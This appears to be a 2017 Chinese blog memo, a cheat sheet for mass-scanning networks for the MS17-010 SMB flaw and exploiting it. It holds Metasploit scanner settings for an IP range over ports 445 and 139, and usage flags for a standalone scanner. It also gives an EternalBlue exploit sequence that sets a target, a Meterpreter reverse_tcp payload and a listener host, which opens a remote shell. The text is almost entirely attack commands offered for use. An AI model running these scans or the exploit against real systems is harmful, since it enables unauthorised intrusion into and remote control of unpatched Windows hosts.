ms17010批量扫描备忘

安装一些依赖:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 
        rm -r ~/.wine 
        wine cmd.exe   
        exit
漏洞扫描一:
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.1-192.168.0.254
set ShowProgress false
set ConnectTimeout 5
set threads 16
services -r tcp -p 445 -R
run

扫139端口的话

set SMBDirect false
set RPORT 139

或者

unset SMBDirect
set RPORT 139
漏洞扫描二:

$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out

指定目标主机列表(每行一个目标):

$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out

该漏洞可以通过139/TCP利用,不限于445/TCP:

$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out -p 139
$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out -p 139

如果不指定"-o scan.out",向stdout输出

-q

    只显示vulnerable主机,否则将显示safe、unknown等其他主机

-m

    实时显示当前扫描目标,可以不指定

漏洞扫描三:
http://www.freebuf.com/sectool/134657.html

漏洞利用一:
gem install ruby_smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.86

漏洞利用二:
http://www.freebuf.com/articles/system/133853.html

  

 

 

 

参考文章:

http://www.freebuf.com/sectool/134657.html
http://scz.617.cn/windows/201706221521.txt
http://scz.617.cn/windows/201707031558.txt

posted @ 2017-07-11 16:38  轻落语  阅读(1116)  评论(0编辑  收藏  举报